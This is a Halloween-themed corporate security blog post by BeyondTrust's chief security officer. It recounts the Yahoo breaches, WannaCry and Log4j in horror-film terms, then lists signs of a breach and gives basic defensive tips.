Trick or Threat?
It’s Halloween—that time of the year for goblins, ghosts, and the scariest things you have ever seen. Nowadays, this includes hackers.
Hackers may not be the first thing that comes to mind when you picture the standard ensemble (or should we say mash) of Halloween monsters, but the picture of them as an icon of horror has certainly evolved from the vigilante social activist we saw with V for Vendetta (although his resemblance to the Phantom of the Opera is certainly not one to be overlooked). And with almost everything we can conceive of being somehow online or in the cloud, the hacker threat is becoming as all-encompassing and inescapable as Michael Myers when he dons his mask.
Just how scary is the hacker? According to Security Magazine, more than 4,100 publicly disclosed data breaches occurred in 2022, leading to the exposure of 22 billion records. Globally, tens of thousands of websites are hacked daily, ransomware attacks happen by the second, and with 3.4 billion phishing emails being sent daily, statistically 1.2% of the emails piling into your inbox are malicious. It’s no wonder 62% of organizations cited phishing as the top cause of identity-related breaches in 2023, or that phishing reached an all-time high in 2022, with 4.7 million total phishing attacks logged over the course of the year.
Back in 2007, a study done by the University of Maryland showed that a cyberattack occurs every 39 seconds. In their 2023 Ransomware Report, Cyber Security Ventures predicts this figure will jump to every 2 seconds by 2031, if we don’t end up there sooner. Just imagine how much more frequently those attacks are occurring now that threat actors are able to leverage advanced technology like AI to make their attack techniques even more efficient. Cap that off with the fact that 70% of all attacks involve attempts to laterally move across the network, and according to the latest IBM Cost of a Data Breach Report, it takes companies an average of 204 days to detect a breach, and approximately 73 days to contain that breach after it has been detected. As a result, the global average cost of a data breach in 2023 was $4.45 million USD, a 15% increase over 3 years.
When we look at those statistics together, the scary story of the hacker becomes a lot, well, scarier—after all, the scariest stories are always based in fact. Do you believe in the boogeyman?
For this Halloween blog, I would like to highlight, as a reminder, some of the scariest tricks (breaches) ever and remind everyone to trick or treat—both online and offline—with safety in mind. After all, it is not called trick or treat for nothing….
3 Scary Cyber-Horror Stories
Here are a few scary stories you can tell your IT security teams after dark.
1. The Yahoo-loween Series: Yahoo Data Breaches (2013-2014, 2016)
Just like the numerous films of the Halloween franchise (I believe there are 13 total now, whether or not you count them all as being canon), Yahoo experienced a series of data breaches that affected billions of user accounts. In 2013-2014, the company experienced one of the largest breaches at the time, affecting over 3 billion accounts. Then, in 2016, it was revealed that data from 500 million Yahoo accounts had been stolen. These breaches exposed user emails, names, passwords, and other personal information, causing widespread concern about online privacy and security—and the fact that someone out there in the dark (hacker) knows your name and where you live. This breach is a classic in terms of how scary a breach can be—and in revealing what can really happen when cyber security, not unlike the neighborhood lore about the boogeyman, is truly not taken seriously.
2. Night of the Living Worm: WannaCry Ransomware Attack (2017)
WannaCry was a global ransomware attack (haunting almost every business with a horrific worm) that infected hundreds of thousands of computers in over 150 countries. It exploited a vulnerability in Microsoft Windows systems, and the scale and rapid spread of WannaCry raised alarms about the potential for nation-state actors to weaponize cyberattacks and highlighted the importance of keeping software patched. If you think of a virus that could cause a zombie apocalypse on computers, WannaCry spread so fast, it was no wonder it makes it onto the top three list of cyber-horrors. Think zombie computers.
3. The Exorcism of Log4J (2021)
The log4j vulnerability, known as CVE-2021-44228, is a critical security flaw that affects Apache Log4j, a popular Java-based logging library. Attackers exploited this vulnerability to execute malicious code remotely, compromising the integrity and confidentiality of affected systems, much like a ghost possessing a person. The flaw allowed hackers to inject arbitrary code through malicious log messages, making it a severe threat to web applications, servers, and any other software that embedded the Log4j library. All of the infected systems became possessed with the code injected by the threat actors to do whatever malicious behavior the hackers saw fit. Organizations worldwide rushed to patch their systems and update affected software to mitigate this vulnerability. This cyber-possession tale highlighted the importance of timely security updates and keeping an inventory of the applications that contain potentially vulnerable open-source libraries.
While some readers may argue these are not the scariest of all times, I would remind readers that they were the first horror hacks of their type. Equifax, MoveIT, FireEye, and even the Mirai botnet were copycats of these original demonic attacks. Their initial horror has desensitized us for many other modern attacks just like the original horror movies—the Exorcist, Carrie, Nightmare on Elm Street, and even my personal favorite, The Challenging with George C. Scott—opened the door for all the new ways modern horror cinema makes our skin crawl.
Handbook for the Recently Breached: Six Signs You’ve been Hacked
These may not be as obvious as crop circles or demonic symbols painted under your bed, but they are a few of the most tell-tale signs your organization is experiencing a cyber-horror story of its own.
- Multiple password retries—the jiggling doorknob of the cybersecurity world: one of the first signs of a breach is numerous attempts to connect with a domain account after multiple password retries and unrecognized login requests. Multifactor authentication is your best bet at mitigation of this cyber-ghoul, but beware of MFA fatigue—it can bite you, too!
- Strange messages coming from inside the organization: spear phishing attempts are now commonly coming from threat actors mimicking business contacts and even c-level executives in your company. The best defense here is to keep your employees well-versed in detecting phishing scams and deception techniques and to enforce good cyber hygiene. Are you hearing voices in the night?
- Unusual activity – book stacking and other inexplicable bumps in the network: monitor for access attempts from unusual locations, during odd hours, or even just outside the normal behavior patterns of employees. A security solution that can help detect abnormal behavior can significantly reduce the amount of time it takes to detect and respond to a breach. Why is the dog barking in the middle of the night?
- Things start moving in slow motion: A slow-running system may not just be locked in its own supernatural dimension; it could have malicious software running in the background, or it could be transferring files outside your network.
- Cries for help: Cyber events can often be signaled by missing files or emails—things that seem benign on the surface but point to something much more sinister bubbling underneath. Don’t ignore a sudden influx of help desk requests involving anomalies like these. When was the last time you made a phone call and got a busy signal?
- Ransomware messages from beyond the grave (or locked-down network): This is probably one of the more obvious signs you’ve been hacked, but it’s important to know “who ya gonna call” in the event you do get a ransom message. Have your cyber response plan ready and make sure you include law enforcement and your cyber insurance company in your plan. Quick shout out to Ghostbusters!
How to Protect Yourself from Cyber Monsters this Halloween
Here are some helpful Halloween tips that can double as strategies for keeping the cyber-monsters at bay.
- Always check your candy - Scrutinize website links, email address, text messages—be on the lookout for suspicious requests, typos, weird-looking email extensions, and other red flags that the person you are talking to isn’t who they say they are.
- Only go to well-marked houses –Make sure the website you are on is the actual company’s site and not a spoof. This includes look-a-like domains that use characters from different localizations to appear legitimate.
- Watch for oncoming traffic – be aware of vulnerability and threat trends that are happening around you and incorporate lessons learned from recent breaches into your cybersecurity strategy, indicators of compromise, and incident response.
Conclusion: Turn the Tables on the Cyber-Spooks
In the same way that any good Halloween horror story could feature ghosts, goblins, aliens, vampires, dolls, or even psychotic maniacs, the scariest cybersecurity horrors involve vendors, worms, and open source library exploits. This Halloween blog serves as stark reminder to you all of the ongoing and evolving threats in the cybersecurity landscape, and how scary they can be for anyone at any time. But don’t take this tale for granted. It's essential that you stay informed about the latest developments in cybersecurity—it’s the only way you’ll be able to protect against such threats and adapt to new attack vectors. Halloween may only be one day a year, but for these cyber attackers, the veil concealing your perimeter is always thin. You need to be ready for the jump scare at any moment.
Morey J. Haber, Chief Security Officer, BeyondTrust
Morey J. Haber is the Chief Security Officer at BeyondTrust. He has more than 25 years of IT industry experience and has authored four books: Privileged Attack Vectors, Asset Attack Vectors, Identity Attack Vectors, and Cloud Attack Vectors. He is a founding member of the industry group Transparency in Cyber, and in 2020 was elected to the Identity Defined Security Alliance (IDSA) Executive Advisory Board. Morey currently oversees BeyondTrust security and governance for corporate and cloud based solutions and regularly consults for global periodicals and media. He originally joined BeyondTrust in 2012 as a part of the eEye Digital Security acquisition where he served as a Product Owner and Solutions Engineer since 2004. Prior to eEye, he was Beta Development Manager for Computer Associates, Inc. He began his career as Reliability and Maintainability Engineer for a government contractor building flight and training simulators. He earned a Bachelor of Science degree in Electrical Engineering from the State University of New York at Stony Brook.